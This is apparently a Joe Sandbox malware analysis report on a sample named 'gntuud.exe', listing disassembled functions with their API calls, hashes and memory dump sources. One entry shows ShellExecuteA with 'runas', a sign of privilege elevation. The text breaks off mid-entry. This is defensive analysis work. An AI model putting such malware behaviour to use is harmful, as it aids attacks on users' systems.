                                                                • String ID:
                                                                • API String ID: 3310240892-0
                                                                • Opcode ID: 88b670f4f441eaf9c52d7adaac583e2ca8d5ef2a53f3b263bed0c6b6207a6bc3
                                                                • Instruction ID: d93702cff96d9b86482a03c3b5f1d4bd7b2cac7a22e29a7da7631487a0085e50
                                                                • Opcode Fuzzy Hash: 88b670f4f441eaf9c52d7adaac583e2ca8d5ef2a53f3b263bed0c6b6207a6bc3
                                                                • Instruction Fuzzy Hash: 6C512970D006049BDB14EB28DE497DEBB75EB46314F9042BAE809A73C1DB399EC08F59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 00976335
                                                                • _free.LIBCMT ref: 0097635E
                                                                • SetEndOfFile.KERNEL32(00000000,00973894,00000000,0096E785,?,?,?,?,?,?,?,00973894,0096E785,00000000), ref: 00976390
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00973894,0096E785,00000000,?,?,?,?,00000000), ref: 009763AC
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction ID: fe752c17c9c77365bbd900e09a0df9a49f21c6d8710ddc4653813ce7698e43ca
                                                                • Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction Fuzzy Hash: 72419373A00A459BDF11ABB8CC46B9D3B79AFC5360F258510F82CE7292EB34D944C765
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 004260CE
                                                                • _free.LIBCMT ref: 004260F7
                                                                • SetEndOfFile.KERNEL32(00000000,0042362D,00000000,0041E51E,?,?,?,?,?,?,?,0042362D,0041E51E,00000000), ref: 00426129
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0042362D,0041E51E,00000000,?,?,?,?,00000000), ref: 00426145
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction ID: 1b0f2aef12d2ca725aa682019014df6231c69ba655f1b492b921229f4394e9e8
                                                                • Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction Fuzzy Hash: 0B412C32B001209BDB11AFB5EC41B9E3765EF04364FA61117F814E7292D73CD851976C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0096C0B6: _free.LIBCMT ref: 0096C0C4
                                                                  • Part of subcall function 00971C08: WideCharToMultiByte.KERNEL32(00955B07,00000000,00437A38,00000000,00955B07,00955B07,0097471F,?,00437A38,?,00000000,?,0097448E,0000FDE9,00000000,?), ref: 00971CAA
                                                                • GetLastError.KERNEL32 ref: 00970C99
                                                                • __dosmaperr.LIBCMT ref: 00970CA0
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00970CDF
                                                                • __dosmaperr.LIBCMT ref: 00970CE6
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: 135b7fae0d8820f34e7ce46e397dc7c63399a5b67f15c621782dc618bafe6ba6
                                                                • Instruction ID: 835f4b60c99aeed44df09f71ac7130efa8aa46c1f12675053f38cda0a09b9df3
                                                                • Opcode Fuzzy Hash: 135b7fae0d8820f34e7ce46e397dc7c63399a5b67f15c621782dc618bafe6ba6
                                                                • Instruction Fuzzy Hash: 5821C8B3604209EFDB21AFA58D81A3B77ACEF84364714CA25F9ADD7151D734EC018761
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0041BE4F: _free.LIBCMT ref: 0041BE5D
                                                                  • Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43
                                                                • GetLastError.KERNEL32 ref: 00420A32
                                                                • __dosmaperr.LIBCMT ref: 00420A39
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00420A78
                                                                • __dosmaperr.LIBCMT ref: 00420A7F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
                                                                • Instruction ID: a194d0f24e8f29cf6dc2264e026a9bddb0740e8876572cad8ab677f0b0fd6e86
                                                                • Opcode Fuzzy Hash: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
                                                                • Instruction Fuzzy Hash: 4C21A771700329AF9B20AF66ACC186BB7ECEF103687D0452AF92997252D738DC418799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction ID: 92c66270a21178a6f4cce1ab987fa8a8a2fc2027d87616b43162b2b4c53a1389
                                                                • Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction Fuzzy Hash: F821B431A05221EBCB319F28BCA5B3B776C9B45760F650631FD17A7291D634ED0096E4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,?,0096C034,00000000,?,?,?,0096C1CD,?), ref: 0096F1E0
                                                                • _free.LIBCMT ref: 0096F23D
                                                                • _free.LIBCMT ref: 0096F273
                                                                • SetLastError.KERNEL32(00000000,004390F8,000000FF,?,?,?,0096C1CD,?), ref: 0096F27E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction ID: ded693f112612725c6adb79e1d7e8c90a7c569fa4ff7e6e82e584a460ff13a99
                                                                • Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction Fuzzy Hash: 5E11083B204602ABDA1027B4BCF6F6F226EDBC17B5B650234F936831E1EE648C1A4510
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,?,0041BDCD,00000000,?,?,?,0041BF66,?), ref: 0041EF79
                                                                • _free.LIBCMT ref: 0041EFD6
                                                                • _free.LIBCMT ref: 0041F00C
                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,0041BF66,?), ref: 0041F017
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction ID: 95c26f371b7850b2bddc85ae7a4fd83e17c88bc25bbbbd0a2489a901185ef23c
                                                                • Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction Fuzzy Hash: 8B110A362042127A96102B7BACC1DEB19699BC1378775013BFD2A822D2EE6D8CDB511C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0096CA9C,0096EE14,?,?,0096951A,?,?,?,?,?,0095235A,?,?), ref: 0096F337
                                                                • _free.LIBCMT ref: 0096F394
                                                                • _free.LIBCMT ref: 0096F3CA
                                                                • SetLastError.KERNEL32(00000000,004390F8,000000FF,?,?,0096951A,?,?,?,?,?,0095235A,?,?), ref: 0096F3D5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction ID: 6cb1c1dc7adc19353f98b9802d3abcac6b2df86514f74199e66c8fa739590267
                                                                • Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction Fuzzy Hash: DB112B333046016BD6112774BCE5E6F226DDBC03F5B250234F539833D1EE648C195220
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0041C835,0041EBAD,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F0D0
                                                                • _free.LIBCMT ref: 0041F12D
                                                                • _free.LIBCMT ref: 0041F163
                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F16E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction ID: 43f7999f07bdf9caa0489b11563b1ed73c9ba6fe2d35dc558eaeab45f7604291
                                                                • Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction Fuzzy Hash: EC114C32200202BAC710267AECC5DEF266997C5778771023BF92A822D2EE6C8CDF411C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction ID: f500fcf5c6e7d66b3f11dd94c1eba391ee2760d272d3a9b35996611b70478088
                                                                • Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction Fuzzy Hash: 1711EE31A01621EFC7329B24DD40A5A77AC9F017B0F510531ED96B7290D738DD00DDEA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0096FC79,00000000,?,009749A1,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0096FB2A
                                                                • GetLastError.KERNEL32(?,009749A1,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0096FC79,00000000,00000104,?), ref: 0096FB34
                                                                • __dosmaperr.LIBCMT ref: 0096FB3B
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction ID: a16b9af80cbdfa9968159f138092475462e6ec4c53a7a8d27bc2b3dd73c6fba0
                                                                • Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction Fuzzy Hash: C0F01D32200115BB8B205BB2ED29D6ABFADFF847A07904531B55DC6421CB35E821DBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0096FC79,00000000,?,0097492C,00000000,00000000,0096FC79,?,?,00000000,00000000,00000001), ref: 0096FB93
                                                                • GetLastError.KERNEL32(?,0097492C,00000000,00000000,0096FC79,?,?,00000000,00000000,00000001,00000000,00000000,?,0096FC79,00000000,00000104), ref: 0096FB9D
                                                                • __dosmaperr.LIBCMT ref: 0096FBA4
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction ID: 641eca0898a8e294607c1749312b53c5de0cd037f275326335e20301cf722a9d
                                                                • Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction Fuzzy Hash: C4F01D36200119BB9B205FF2ED29D6ABFADFF447A03844531F55DC6521DB35E821DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041F8C3
                                                                • GetLastError.KERNEL32(?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104,?), ref: 0041F8CD
                                                                • __dosmaperr.LIBCMT ref: 0041F8D4
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction ID: 803fc007063167f67073d72d48b77dd8b306300581abe4bc3ca65f7a6a8e9d61
                                                                • Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction Fuzzy Hash: 19F01232700115BB8B206BA6DD0499BBF69FF443A43504536F51DC6121DB35E8A7D7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001), ref: 0041F92C
                                                                • GetLastError.KERNEL32(?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104), ref: 0041F936
                                                                • __dosmaperr.LIBCMT ref: 0041F93D
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction ID: 37d27302a1a2eca8b092f01353d8cc03fb9fecfc19a8c04071e9600c3881e131
                                                                • Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction Fuzzy Hash: 66F06271200515BB8B206BA2CD04E97BFA9FF443A03404536F51DC6120CB35E8A7CBD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • WriteConsoleW.KERNEL32(00955B07,0000000F,00437A38,00000000,00955B07,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07), ref: 0097763D
                                                                • GetLastError.KERNEL32(?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000,00955B07,?,009746B8,00955B07), ref: 00977649
                                                                  • Part of subcall function 0097760F: CloseHandle.KERNEL32(00439900,00977659,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000,00955B07), ref: 0097761F
                                                                • ___initconout.LIBCMT ref: 00977659
                                                                  • Part of subcall function 009775D1: CreateFileW.KERNEL32(004336B8,40000000,00000003,00000000,00000003,00000000,00000000,00977600,00976D2B,00955B07,?,00974164,00000000,?,00955B07,00000000), ref: 009775E4
                                                                • WriteConsoleW.KERNEL32(00955B07,0000000F,00437A38,00000000,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000), ref: 0097766E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction ID: b5d13b3109236e33a76f77812e94f4066ee426550eac5a386c6793f5f8bcdc3b
                                                                • Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction Fuzzy Hash: 01F01537100118BBCF222FD5DC08E8A7F66FF483B0B818030FA1C85222DA328820DB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,004058A0,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0), ref: 004273D6
                                                                • GetLastError.KERNEL32(?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0,?,00424451,004058A0), ref: 004273E2
                                                                  • Part of subcall function 004273A8: CloseHandle.KERNEL32(FFFFFFFE,004273F2,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0), ref: 004273B8
                                                                • ___initconout.LIBCMT ref: 004273F2
                                                                  • Part of subcall function 0042736A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00427399,00426AC4,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 0042737D
                                                                • WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 00427407
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction ID: f4aa61af986e557aabc683dea4287ad527f4dae7078adb09fe65b6480a605f88
                                                                • Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction Fuzzy Hash: 0DF01236200128BBCF222F95EC0598A3F66FF09761B814035FE1885221D6328861DB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                                • API String ID: 0-628885649
                                                                • Opcode ID: 4384fd4c7d60fd48786ba2f8ba0e2bbfb8053213faeb400222fc4ced953b2255
                                                                • Instruction ID: 8602bfdec2ba9931ae491216d2998d162781e25230674f4e1f4563e8e5d98bf1
                                                                • Opcode Fuzzy Hash: 4384fd4c7d60fd48786ba2f8ba0e2bbfb8053213faeb400222fc4ced953b2255
                                                                • Instruction Fuzzy Hash: 6C418DB1F01218AFDB21DB99D881EAEBBBCEB85310F14406AF464D7251EB708E40CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                                • API String ID: 0-628885649
                                                                • Opcode ID: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
                                                                • Instruction ID: 9698455488551ced2192efa7f0ee548952e5698eb24d3f820b7e273d75b3104a
                                                                • Opcode Fuzzy Hash: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
                                                                • Instruction Fuzzy Hash: 0441A2B1E40214AFCB11DF9ADCC1AEFBBB8EB99314F10006BE50597251D7789E82CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00969856
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0096990A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 3480331319-1018135373
                                                                • Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction ID: 3ff39e89a07caf1827aec6e331bab15967e96c99701f8d60efbe86ebf2be6031
                                                                • Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction Fuzzy Hash: 9141D534A00218AFCF10DF68C884AAEBBB9FF85324F148065E815AB352D775DD45CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ShellExecuteA.SHELL32(00000000,00429928,?,?,00000000,00000000), ref: 009546BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: +CC$runas
                                                                • API String ID: 587946157-2150734417
                                                                • Opcode ID: 7f3ba68d816b0de774c86b4e9781535488c104e7f06803af1df952845e7cbee8
                                                                • Instruction ID: 800dd56fd9fab4e64c08cb9486bb809f6a8ba5ebcaa4ae827ef1522810a17fab
                                                                • Opcode Fuzzy Hash: 7f3ba68d816b0de774c86b4e9781535488c104e7f06803af1df952845e7cbee8
                                                                • Instruction Fuzzy Hash: A541E171600208ABDF08DF69CC92BDE7BA5EB89714F908219FC16472C1C779AA84CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0097153B: GetOEMCP.KERNEL32(00000000,009717AD,0096C1CD,?,?,?,?,?,0096C1CD), ref: 00971566
                                                                • _free.LIBCMT ref: 0097180A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: c
                                                                • API String ID: 269201875-2927717585
                                                                • Opcode ID: 59700cfabe1b01976d58ff7d39ffcd138362064eb8fa421b8e4a4a61f6cd251d
                                                                • Instruction ID: 77b542ce73ad1c1387c8e2fe6b16ab784e707b87182c07c573907f2bf8a8c8d0
                                                                • Opcode Fuzzy Hash: 59700cfabe1b01976d58ff7d39ffcd138362064eb8fa421b8e4a4a61f6cd251d
                                                                • Instruction Fuzzy Hash: C431AD72900249AFDF01DF6CD881BDA7BF8EF84314F15806AF9189B2A1EB719D50CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 004212D4: GetOEMCP.KERNEL32(00000000,00421546,0041BF66,?,?,?,?,?,0041BF66), ref: 004212FF
                                                                • _free.LIBCMT ref: 004215A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
